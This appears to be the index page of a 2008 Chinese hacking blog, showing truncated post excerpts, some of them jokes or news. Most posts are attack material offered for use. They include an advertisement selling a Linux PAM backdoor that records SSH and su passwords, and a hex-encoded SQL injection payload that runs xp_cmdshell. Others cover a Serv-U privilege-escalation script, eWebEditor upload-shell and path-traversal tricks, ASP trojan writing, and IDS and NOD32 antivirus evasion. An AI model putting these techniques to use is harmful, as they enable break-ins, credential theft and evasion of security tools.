既然已经失去了进入天堂寻觅幸福的资格..那么就让我沉沦地狱吧!

卡巴斯基网站被黑客攻破

烟花剑客 — Wed, 23 Jul 2008 17:56:00 GMT

牛人无数，sql无处不在啊！

北京时间7月22日消息，据国外媒体报道，俄罗斯信息安全厂商卡巴斯基实验室的马拉西亚网站周六被黑客攻破，相关的一个网络购物站点也受到影响。

　　网络安全组织Zone-H记录了这次攻击。
　　
　　记录显示，攻击者昵称为“m0sted”，攻击采用了“SQL注入”的方式。卡巴斯基随后关闭了该网站，该网站采用的是微软的IIS网络服务器。随后该网站不再面向所有用户开放，在接入前要求输入用户名和密码。

　　Zone-H同时公布了卡巴斯基该网站被攻破之后的截图。卡巴斯基尚未对这一事件发表评论，不过Zone-H表示，由于此次的攻击仅仅是以破坏为目的，因此未来还有可能出现更严重的安全风险。

　　卡巴斯基在该网站上提供评估版的安全软件下载，因此攻击者有可能以卡巴斯基的名义在该网站上发布恶意软件，这将对用户造成巨大威胁。

linux pam后门

烟花剑客 — Mon, 23 Jun 2008 21:45:00 GMT

废话不多说了,直接把动画txt写上,要的联系,货真价实的.联系qq:909473606

1.安装
编译好后，cp过去文件即可
有的发行版本，会自己做自己的发行版so，所以一般来说，我们都先在自己机器上编译好后门传上去
linux一般来说发行版比较多，所以我们在安装后门之前，最好在本地搭建个类似的环境实验，这样不容易丢鸡

我现在要安装后门的机器是fc4 具体内核没啥限制应用层后门就这点好，呵呵

安装
我已经编译好了

安装完毕，那个so穿上去就行了
这是我们的后门

注意吧pam_unix.so文件的属性改的和别的so属性一样。我这里本来就是一样的，我就不改了。

OK，安装完毕

现在看看他有什么功能

1.记录密码
这个后门可以记录所有登录sshd的用户密码，以及su的密码，默认，没开启记录功能。开启方法如下

我们开启

touch

俩对联(不得不说,中国人最聪明)

烟花剑客 — Fri, 23 May 2008 01:26:00 GMT

上联：八级地震毫无预报延误几万同胞性命下联：六级余震信口开河折腾千万市民睡觉横批：没搞准过上联:地震专家不学无术，震前鸦雀无声下联:防震部门急功近利，震后屁话连天横批:震震有词

天才学生

烟花剑客 — Fri, 02 May 2008 21:26:00 GMT

1.某次考试考语文，我的同桌在默词的时候突然灵感来了~前句：问君能有几多愁，要求补后句，他补了句：恰似一道红叉卷上留（原句：恰似一江春水向东流）。老师毫不客气得在卷上打了个X。他还沾沾自喜说：“原来我的灵感好灵的！”

2.也是语文考试默词，题目是：玉不琢，不成器。结果我们班一强人答：朋友妻，不客气，第二天家长就被叫到学校了。

3.又是语文考试，题目：长江后浪推前浪；某人答：一代更比一代浪。结果自然是家长又见校长。

4.高中的时候考试有道题是这样的：请写出鲁迅先生的作品《藤野先生》中藤野先生的全名。其答案如下：藤野菜菜子，藤野英二狼，（当时正好有放棒球英豪这个动画片）藤野武大郎，藤野花道，藤野五十六，藤野内丰，藤野隆史等等等等，比较绝的有：藤野小绵羊，气的老师在广播里骂我们无知。

5.一题曰“清水出芙蓉”，有人居然答到“乱世出英雄”，或答“山村出美女”，或答“深海出蛟龙”&hel

ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER

烟花剑客 — Fri, 25 Apr 2008 17:52:00 GMT

HTTP-REFERER这个变量已经越来越不可靠了，完全就是可以伪造出来的东东。

以下是伪造方法：

ASP/Visual Basic代码
dim http
set http=server.createobject("MSXML2.XMLHTTP") '//MSXML2.serverXMLHTTP也可以
Http.open "GET",url,false
Http.setRequestHeader "Referer","http://www.dc9.cn/"
Http.send()

PHP(前提是装了curl):

PHP代码
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "

Do All in Cmd Shell

烟花剑客 — Sun, 16 Mar 2008 05:23:00 GMT

Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。

文件传输
对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：

1，用Echo命令写ASP木马。
前提当然是目标主机上已经安装了IIS。
一般的ASP木马"体积"较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。
直接给出echo版：

@echo ^ >up.asp

注意，只有一行，中间没有回车符。
生成的up.asp不能用浏览器访问，只

J2ee web渗透

烟花剑客 — Sun, 16 Mar 2008 02:15:00 GMT

J2EE的WEB，都有一个WEB-INF的目录，这个目录下有所有的WEB配置文件，数据库配置文件和java二进制文件class文件。有很多站因为配置错误或者是默认配置，导致WEB-INF目录可浏览。通常一些J2EE WEB平台还有些通用的限制绕过漏洞

/WEB-INF../ /WEB-INF..%5C

J2EE的程序访问是通过配置文件里的路径设定实现的，"/xxx.do",并不代表目录下有xxx.do这个文件。

JSP的注射，现在已经有些工具可以实现，手工就没必要介绍了。但jsp有一些通用的源码泄露漏洞（一些流行的JSP WEB平台现在已经没这些漏洞了，低版本的还是有。如果看到是些不常见的JSP服务器，可以试一下）

.jsP .Jsp .jSp .JSP .jsp%2e .jsp%20 .jsp%80 .jsp%81.....jsp%89

关于HTTP访问和SSL访问差异，在有些情况下，WWW和SSL对WEB的访问，采取的是不同的配置。比如WEB

好个艳照门

烟花剑客 — Mon, 25 Feb 2008 03:35:00 GMT

忽然发现1个多月前替代就给我几张此照片，我还笑他是ps的，这傻！

躲避IDS

烟花剑客 — Wed, 16 Jan 2008 22:58:00 GMT

1．关于openrowset和opendatasource

　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下：
select * from openrowset('sqloledb','myserver';'sa';'','select * from table')

　　可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。

　　那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！
select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshel l ''dir c:\''')
必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的o

SU6.x提权脚本

烟花剑客 — Tue, 15 Jan 2008 10:03:00 GMT

Serv-U 6.X 提权脚本
使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在"服务器端口"里填21，然后再在"服务器IP"中填写服务器的真实IP。
复制内容到剪贴板代码:
<%@ LANGUAGE = VBScript %>
<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(reque

ewebeditor

烟花剑客 — Sun, 13 Jan 2008 05:31:00 GMT

打开eWebEditorNet/upload.aspx，选择一个cer文件。
再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。

SQL盲注攻击技术

烟花剑客 — Thu, 10 Jan 2008 05:11:00 GMT

SQL盲注攻击技术综述

1 SQL盲注攻击技术综述 Javaphile
SQL盲注攻击技术综述
coolswallow of Javaphile (coolswallow@shaolin.org.cn)
Blind SQL Injection Techniques: A Survey
Abstract: This paper gives a survey of current Blind SQL Injection Techniques. It first introduces the definition
of SQL Injection and its risk, and reviews several solutions proposed to solve the problem and their each
disadvantages. Then, the paper discusses that if detailed error messages are suppressed, how to

ewebeditor遍历路径漏洞

烟花剑客 — Wed, 09 Jan 2008 06:09:00 GMT

ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.cnblogs.com/../.. 看到整个网站文件了

饶过IDS检测方法

烟花剑客 — Thu, 03 Jan 2008 06:19:00 GMT

首先我说一下如何检测过滤了什么,其实满简单,用and '关键字'='关键字'来判断
如果and 1=1和and 1=2判断有注射的话
and 'a'='a'和and 'a'='b'应该是一样的返回结果,如果出错,说明过滤了单引号,这是个比较简单的判断方法
在不过滤引号的前提下,我们进行其他关键字的判断.
and 'exec'='exec' 正确
说明没有过滤exec,如果过滤了,返回错误.
其他的判断方法就不说了,这个比较简单有效.

再说饶过的办法吧.

1.用16进制来饶过单引号和关键字,这个方法是最普通的
前提是不过滤declare.而且该注射点支持多语句执行
本来不想写了,看看还是写个吧
过程是这样的
xx.asp?id=1;declare @a varchar(8000);select @a=0x6D61737465722E2E78705F636D647368656C6C20276E6574207573657227;exec(@a);--

过NOD内存何须如此麻烦

烟花剑客 — Mon, 19 Nov 2007 02:08:00 GMT

小雨处抓来的！

要移动硬盘里面的aio到别处，老是给NOD32杀，郁闷球。

有没有什么方法能绕过去呢？

方法当然是有的，关键看你有没有创造力了，嘿嘿。

nod32查毒之前会先看看文件的后缀是不是可执行文件，像什么exe，com啦之类的，那要是我自己创造一个可执行文件的格式呢？

闲话少说，看过程：

导出注册表里的.exe子项，然后修改.exe，比如我要增加一个.tt的后缀文件，我可以改成如下的样式：

-------------------------------Cut Here -----------------------------------------------

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.tt]
@="exefile"
"Conte